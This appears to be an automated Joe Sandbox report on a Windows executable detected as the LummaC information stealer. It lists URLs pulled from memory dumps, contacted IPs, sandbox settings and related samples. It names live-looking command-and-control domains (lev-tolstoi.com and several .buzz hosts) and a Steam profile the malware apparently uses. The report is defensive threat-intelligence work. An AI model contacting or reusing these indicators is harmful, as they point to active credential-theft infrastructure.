                                                                                                                      https://steamcommunity.com/profiles/76561199724331900/inventory/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1626755261.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643372396.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1599170541.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643550627.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1517261667.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1599605647.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1623931109.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brhx0wBsOjkQ.exe, 00000000.00000003.1567544621.00000000058E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://store.steampowered.com/privacy_agreement/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=enghx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amhx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://prisonyfork.buzz:443/apiahx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                		unknown
                                                                                                                                https://store.steampowered.com/about/hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://steamcommunity.com/my/wishlist/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://help.steampowered.com/en/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://steamcommunity.com/market/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://store.steampowered.com/news/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Prhx0wBsOjkQ.exe, 00000000.00000003.1592981595.00000000057D3000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1591591909.00000000057D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=hx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://store.steampowered.com/subscriber_agreement/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1517261667.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orghx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1517261667.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://lev-tolstoi.com/apishx0wBsOjkQ.exe, 00000000.00000003.1672980605.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643550627.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000002.1673929346.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643372396.0000000000E72000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                    		unknown
                                                                                                                                                    https://steamcommunity.com/discussions/hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://store.steampowered.com/stats/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amhx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://lev-tolstoi.com/apillhx0wBsOjkQ.exe, 00000000.00000003.1517343643.0000000000E20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                          		unknown
                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pnghx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&ahx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://store.steampowered.com/steam_refunds/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://x1.c.lencr.org/0hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://x1.i.lencr.org/0hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYihx0wBsOjkQ.exe, 00000000.00000003.1591591909.00000000057D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchhx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&ahx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=ehx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://steamcommunity.com/workshop/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://support.mozilla.org/products/firefoxgro.allhx0wBsOjkQ.exe, 00000000.00000003.1567544621.00000000058E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_chx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://lev-tolstoi.com/apiaLxzhx0wBsOjkQ.exe, 00000000.00000003.1567527406.00000000057D7000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1565923725.00000000057D4000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057D4000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1566708973.00000000057D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://store.steampowered.com/legal/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1517261667.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=enhx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=enghx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://lev-tolstoi.com/9hx0wBsOjkQ.exe, 00000000.00000002.1673905575.0000000000E61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icohx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&ahx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=englhx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://scentniej.buzz:443/apihx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://store.steampowered.com/hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64hx0wBsOjkQ.exe, 00000000.00000003.1592981595.00000000057D3000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1591591909.00000000057D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&amp;l=ehx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://cashfuzysao.buzz:443/apihx0wBsOjkQ.exe, 00000000.00000003.1599230927.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1626918311.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pnghx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpghx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gifhx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://ac.ecosia.org/autocomplete?q=hx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://hummskitnj.buzz:443/apihx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                https://lev-tolstoi.com:443/apihx0wBsOjkQ.exe, 00000000.00000003.1626918311.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpghx0wBsOjkQ.exe, 00000000.00000003.1592981595.00000000057D3000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1591591909.00000000057D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQhx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high

                                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                      172.67.157.254
                                                                                                                                                                                                                      		lev-tolstoi.comUnited States
                                                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                      23.55.153.106
                                                                                                                                                                                                                      		steamcommunity.comUnited States
                                                                                                                                                                                                                      		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                                      General Information

                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                      Analysis ID:1581582
                                                                                                                                                                                                                      Start date and time:2024-12-28 09:28:25 +01:00
                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                      Overall analysis duration:0h 5m 10s
                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                      Number of analysed new started processes analysed:5
                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                      Sample name:hx0wBsOjkQ.exe
                                                                                                                                                                                                                      renamed because original name is a hash value
                                                                                                                                                                                                                      Original Sample Name:e58e6e26d4ff748bd8e7f718372f8351.exe
                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@1/0@11/2
                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                                      HCA Information:Failed
                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                                      • Stop behavior analysis, all processes terminated

                                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 4.245.163.56
                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                      03:29:36API Interceptor11x Sleep call for process: hx0wBsOjkQ.exe modified

                                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                                      IPs

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      172.67.157.254fnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                            k0ukcEH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                MaZjv5XeQi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  jT7sgjdTea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    Y4svWfRK1L.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      YKri2nEBWE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          23.55.153.106fnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            PW6pjyv02h.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  Neverlose.cc-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse

                                                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                              lev-tolstoi.comfnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                                              Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                                              Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                                              Installer.exeGet hashmaliciousLummaCBrowse
